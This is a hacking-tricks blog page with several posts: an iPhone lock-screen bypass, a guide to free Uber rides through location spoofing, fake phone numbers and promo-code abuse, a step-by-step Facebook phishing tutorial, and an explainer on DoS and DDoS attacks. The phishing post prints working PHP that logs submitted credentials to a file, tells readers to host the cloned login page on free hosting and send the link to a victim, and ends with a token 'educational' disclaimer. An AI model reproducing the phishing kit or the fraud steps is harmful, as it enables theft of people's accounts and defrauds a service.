Showing posts with label mac. Show all posts
Showing posts with label mac. Show all posts

Friday, 1 April 2016

Unlock iPhone without Passcode(iOS 8 and 9)

Hey guys , UserX keeps posting some cool trick to make your PC or Mobile experience better and better.

So We're back again with another cool trick to unlo iPhone without a passcode (with proof .)

Apple manufactures the iPhone and keep releasing new devices to keep you updated to their technologies and user experience.The more devices they release , their are most of the chances that you will find a new bug in that iOS version.

So in iOS 8 and upto iOS 9.2 there is a bug in iPhone that you can make it fool without unlocking the phone , and finally after four to five steps you will be in Home Screen , and yes you don't enter password.
But , if you think by going to home screen , you can change the password of iPhone, so sorry this is not possible as you require an old password for this thing. This trick is just for fun so enjoy it.



\
The video demonstration of step by step guide to do so is right Here.

Wednesday, 3 February 2016

Uber unlimited rides hack.(Only at user x) latest trick 2016

             UBER HACKED!


HOW TO GET FREE UBER CAB RIDES WITHOUT ANY MOBILE NUMBER! 2016 New Trick


 [ IF YOU ARE CALCUTTA (KOLKATA) USER THEN DO NOT DO STEPS FROM 1 TO 3 ]

1. 1st of all download Fake Location Spoofer app. [ CLICK HERE ]


2. Turn on " Allow mock locations " option in settings / Developer options.


(If you cant see developer options, thengo to " About Device " and click on " build number " ( mi users click on " MIUI VERSION " ) mutiple times)


3. NOW OPEN ANDROID SETTINGS / LOCATION / TURN ON LOCATION / GOOGLE LOCATION HISTORY - CLICK ON IT AND CLEAR IT ... Now turn on GPS on HIGH ACCURACY and Now open fake location spoofer app and do as in image.


4. Download uber app from play store. [ CLICK HERE ]

5. Open app and register 


** Now Main Uber Free Ride Trick starts From Here**


6.Download Text+ App from Playstore- [click Here] and click on " skip " then " skip " then enter some details like name.


7. Click on menu and go to settings and click " contact info " and click " get my number " to get your number.


8. Now Goto above provided Fake Location app and select any Kolkata location There


9. Now Just open The downloaded uber app >> sign up fake India mobile number >>and apply code aadarshk17ue… ( if they ask anytime for otp then click on " X " icon from top left side. )


>> Now proceed for ride booking >> it will say verify mobile number >> then just click for change number and register for " US " Number >> and put canada’s number which you have created in next+ app 


Bingo!!! Its done Now Go For Free Uber Ride with This Trick 


10. On the next page you will be asked " Select how would you like to pay " and you have to click on " Cash "


11. Now click on the menu situated in the left upper corner and click " Promotions " and enter promo code " aadarshk17ue "


YOU WILL GET 250 Rs. AS PROMOTIONAL CASH.

loot Looo Uber Ko! :P 

Friday, 8 January 2016

What is Phissing? How to hack facebook account


Phissing-hack facebook account with phissing


  1. Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.
  2. How to create phissing page-


  3. 1.Go to the Facebook  ,and then right click on the page, u will see the option "view source" page,click on that.




                                              

    2.Now a new tab will open which contain a source code,Select all the codes and paste it in a notepad.
    3.Now open notepad and find action
    4.You will have to find a text which looks like 

                                           action="https://www.facebook.com/login.php?login_attempt=1"

    5.delete all the text written after action= and instead of it write post.php
                                                     EXAMPLE-"action="post.php"

    6.Now save it on your desktop with the name index.htm,not index.html,remember.


    7.Now your phishing page is ready


                                                       
    8.Now u need php code (it is main part )Open a new notepad and save the given data with the name post.php.

    <?php
    header ('Location:http://www.facebook.com/');
    $handle = fopen("usernames.txt", "a");
    foreach($_POST as $variable => $value) {
       fwrite($handle, $variable);
       fwrite($handle, "=");
       fwrite($handle, $value);
       fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?> 

    9.You have two files now one is index.htm and another is post.php,remember file extension is important.

    10.Now u have to upload it in any  a web hosting site which supports php script,i prefer u to use www.000webhost.com or www.,my3gb.com.

    11.Here i'm using 000webhost because i have an alredy account in it
                               
    hosting website
                                                  

    12.You have to make a account in that ,after that it looks like a picture given below.


                                                                              
    13.Now go control pannel,then on file manager.

    14.After that a new window will pop up.Now go to public_html.
     

                                               
                                            

    15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .



                                            
    16.Now the last step click on view of index.htm it will look same as facebook page.


                                             

    17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

    18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                    

                                            

    19.Click on view now u will have your friend's password and email id.

                                               
     
    20.This is a simple trick to hack any Facebook password account by phishing page.

    21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
          in to the description of that video u will find a prepared module of phishing pages,download  
          it and enjoy. 

    1. YOU CAN DOWNLOAD FACEBOOK PHISSING FILE NO NEED TO DO ANYTHING JUST DOWNLOAD AND UPLOAD FILE TO 00webhost OR any other webhosting site.

    note: Phissing is illegal activity.Don't

  4. try to anyone.Don't use ur Hacking 

  5. telent to harm any one.

  6. This tutorial is for educational propose

  7.             +Aman Kumar 

What is Denial of Service (DoS) Attack?

What is Denial of Service (DoS) Attack?




Denial of service attack or DoS attack is one of the most common and popular way to exploit and cripple the target (victim) machine. These attacks isolates the victim from its resources like web sites and services by crashing the servers or slowing them down. The DoS attack can be initiated by flooding target machine with so many request at the same time that makes victim’s server crash or unable to respond.
Let’s take an example, suppose you are involved in a group discussion and you have a very important point to share. There’s an another guy John, who doesn’t want you to speak out anyway, so what he can do is engage you with his useless questions and you will continuously answer or argue with him without giving any thought, this will isolate you from rest of the group and other guys won’t be able to communicate with you to conclude the discussion. In above scenario you were the victim and John was the attacker. This scenario is quite similar to the DoS attack.
DoS
Simple DoS
However a simple DoS attacks can be easily prevented by identifying the source of the requestsby its IP and blocking or blacklisting it. By doing this, server (victim) can now identify these blacklisted IPs and can ignore any request generated from it.
DoS attacks can also be carried out by injecting packets and disturbing protocol handlers. Some examples of DoS attacks are
  1. Ping of death: Pinging victim with ridiculously large packets (>65,535 bytes).
  2. Teardrop attack: Fragmented overlapping packets.
  3. LAND attack: LAND stands for Local Area Network Denial, it uses spoofed packets (TCP SYN with senders IP = victim’s IP) to lock the network.
  4. Others: WinNuke / Out-of-band.
This remedy gave birth to a very smart and new kind of DoS attack which is known as DistributedDenial of Service of DDoS attacks which is explained below.
Distributed Denial of Service Attack (DDoS)
In DDoS attacks, attacker needs a amplifying network through which attacker can distributespoofed requests over the network, this makes it impossible for victim to identify the origin of attack because the packets/requests are originating from different source within the network , hence blocking or blacklisting particular IP won’t be able to stop the attack.

DDoS
Typical DDoS attack
Attacker sends control packets to Masters over distributed network and these Masters send similar control packets to zombies /agents which converts this packets into attack packets and sends all the way into the victim server, here masters and zombies/agents are compromised computers running attacker’s code.
The amplifying network mentioned above amplifies the rate and size of packets.
Difference between DoS and DDoS
Let’s consider a rather simple example, suppose you took a vow to take revenge from John (from previous example) who has some webpage hosted over the network. At first you opened victim’s (John’s) web page and start pressing F5 (refresh) continuously by which lots of request is fired to victim’s server making it slow and non-responsive. John however saw this attack (spoofed traffic) and immediately blocked attacker’s (yours) IP address and started ignoring all further request/packets from you.
This was DoS attack and its prevention, but as you also knew the working of DDoS, you called all of your friends and told them to keep refreshing victim’s (John’s) web page. Now John is having hard time to determine which request is spoofed and which is natural, due to which it became impossible for victim to avoid it. This is how simple DDoS attacks are implemented.
Motives of DoS/DDoS attacks
  1. Extortion by threatening victim to launch DoS attack.
  2. For exploiting or training – Some tech junkies perform these attacks because they can, there’s no solid motive or goal behind it. Majority of these attackers are youth mischief who has desire to feel the power to “rule the world”.
  3. Cyber warfare – To avoid information exchange.
  4. Revenge- To take revenge from particular organization. Attackers might attack over little disagreement